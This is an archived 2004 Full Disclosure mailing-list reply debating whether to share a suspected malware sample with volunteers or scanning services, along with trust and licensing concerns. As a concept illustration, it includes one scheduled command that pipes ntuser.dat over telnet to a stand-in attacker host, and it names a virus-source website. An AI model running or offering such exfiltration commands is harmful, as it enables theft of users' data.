Full Disclosure mailing list archives
Re: win2kup2date.exe ?
From: James Tucker <jftucker () gmail com>
Date: Fri, 3 Sep 2004 13:46:31 +0100
On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey <keydet89 () yahoo com> wrote:
James, I'm replying off-list for the simple fact that I can't believe the post you sent to FD. Your questions back to Nick are...well, what's the right word???...it's as if you're not even paying attention.
Apologies I will try to explain myself. I am sending this back to the list, as it is obvious that my meaning was not clear, and there may be some points to be learned by others also. Thank you for pointing this out to me.
... If you want to email me a copy of it, I'll rip it apart and see what can be seen.And world plus dog should entrust you with suchmaterial because??? ... most viruses, trojans and malware to not store copies of stolen data in their executables. Furthermore the file size is very small.Interesting answer, but completely non-sequitor. Nick asked why this person should be trusted with a live bit of malware, and your response is that it's not very big??? What does that have to do with anything?
Malware and viruses are VERY readily available in many places accross the internet. Therefore this point should be of no concern. The only other concern which may be important is the possibility that the binary is carrying data from the infected system; it was this that I was refering to. Please accept my apology for not making this clearer.
P.S. Send it to [...] - it's my "catch all" forvirus/unknown files. Just be sure to ZIP it upor else the web hostwon't let it through. Otherwise I have disabledall checks/scan.Downloads directly to a secured Linux box.That's all very nice, but alone, far from themakings of someone toentrust arbitrary, suspected malware samples to."Entrust", just what exactly are you thinking you might be giving away?Well, it's pretty obvious...a live bit of malware. It's really pretty obvious what Nick's getting at...why send this malware to some arbitrary person? Who's to say that he's going to use it as he says, and not send it back out to someone else?
To what end? It would be much more useful to an attacker to go and collect and customise one of the many readily available trojans on the internet, rather than spreading malware which they have no control over. IMHO your concern is closer to cynicism than practical reality.
Again, you suspect allot of deception here, and while it is of course possible you are correct, I have yet to see this ever done in practice.You haven't seen deception in practice...in general, or specifically in the case of VirusTotal?
If the virus was carrying data from the local system, and some hackers had set up a fake site of the VirusTotal sort, this would be a sophisticated way of decieving "security pros" into passing out details. It would be easily possible to carry all of their password hashes, for example, if any of them run VPNs this would be a near instant release of access passwords (an army of several hundred zombies could decode all the LM hashes in minutes).
Samples of non-data carrying viruses or trojans are of little use to anyone other than Anti-Virus firms, as it is easy to collect raw source for most if one is so inclined.Really? Are you able to do so? I would submit that many with malicious intent don't know the sites and sources you seem to be aware of, and will actually ask for the binary...for the purpose of releasing it against someone else. Non-data carrying or otherwise, it doesn't matter. I received several IMs just this weekend in which I was asked for running viruses.
Well, the same lack of trust may be given to you. In order find a balence between proving my point and not providing you with up to date info, I will provide you with this (http://vx.netlux.org/) site as an example, which is not carrying any modern sources at this time. You can find these easily by trawling security sites of high standards, they have outbound links to such sites. Google is rarely your freind in this regard, which may be why you are not aware of the high numeracy of such sites on the internet. Needless to say that this lack of awareness is possibly a good thing for most people (read: reduces script-kiddie access to such data).
I agree that it is unlikely they have sufficient client licenses to provide such a service; however I can see that there are a great deal of arguments in law about how their case may be won.If a product is used in a manner for which it is not sufficiently or correctly licensed, how can one then use the law to win their case? After all, it wouldn't be "their" (ie, VirusTotal's) case...it would be a case brought against them by the vendor.
I am not a lawyer, but I have seen cases won due to lack of definition of a license. In this case the argument I gave is not contradicted by any of the licenses involved as far as I can see. As I said though, I am not a lawyer.
They may for example only be required to carry one license, they could argue that they are simply allowing users to deliberately infect their systems, and making portions of the logs publicly available.That does make any sense at all...if they are required to carry only one license, then their copy of the product would be sufficiently licensed, and any case brought against them would be over before it started.
My point exactly, until the case is brought into a court room it is probably one of the lesser defined scenarios under current interpretation of law.
If there are viruses which commonly copy target system data, or sensitive data into their binaries at the present time (I imagine the mention of this deception may well spring at least one such virus) then I apologise that I am not aware of it.Does it matter exactly what the malicious code does?
In this case the deception could be very serious as capturing the password details of a security professional is arguably more "interesting" and might (possibly) be more valuable to an attacker. This would be a good deceptive method of doing so. As to whether generically it matters what a virus does, no, of course if a virus is defined as being such, it is malicious and should be removed anyway. Sometimes it is important to know its functionality, as what if it had secretly run a command like: at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337" The antivirus program would remove the virus, but your registry data would still get sent to the hacker site as this data is not illegal in the system. Before anyone has a go at me over access to ntuser.dat / timing issues / whatever, this is concept example only; use your heads please.
There is always no need for aggressive statement of suspicion, which you are close to here. While I understand aggression due to anger, I am concerned that one should not get angry at someone offering them a service merely because one is suspicious of them. What if the offer of help is entirely genuine?I think that you're entirely missing the point, as I've already pointed out.
I apologise that this message of mine was not as clear as it should have been. Thank you for pointing it out to me. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: win2kup2date.exe ?, (continued)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 02)
- Re: win2kup2date.exe ? Nick FitzGerald (Sep 02)
- Re: win2kup2date.exe ? James Tucker (Sep 02)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 02)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 02)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 03)
- Re: win2kup2date.exe ? Nick FitzGerald (Sep 02)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 02)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 02)
- Re: win2kup2date.exe ? James Tucker (Sep 02)
- Re: win2kup2date.exe ? Nick FitzGerald (Sep 03)
- Re: win2kup2date.exe ? Bart . Lansing (Sep 08)
- Re: win2kup2date.exe ? Bugtraq Security Systems (Sep 08)
- Re: win2kup2date.exe ? Barry Fitzgerald (Sep 08)
- Re: win2kup2date.exe ? Über GuidoZ (Sep 08)
- Re: win2kup2date.exe ? Nick FitzGerald (Sep 09)
- Re: win2kup2date.exe ? Richard Johnson (Sep 09)
- Re: win2kup2date.exe ? Nick FitzGerald (Sep 09)
- Message not available
- Re: win2kup2date.exe ? Richard Johnson (Sep 09)
- Re: win2kup2date.exe ? Micheal Espinola Jr (Sep 09)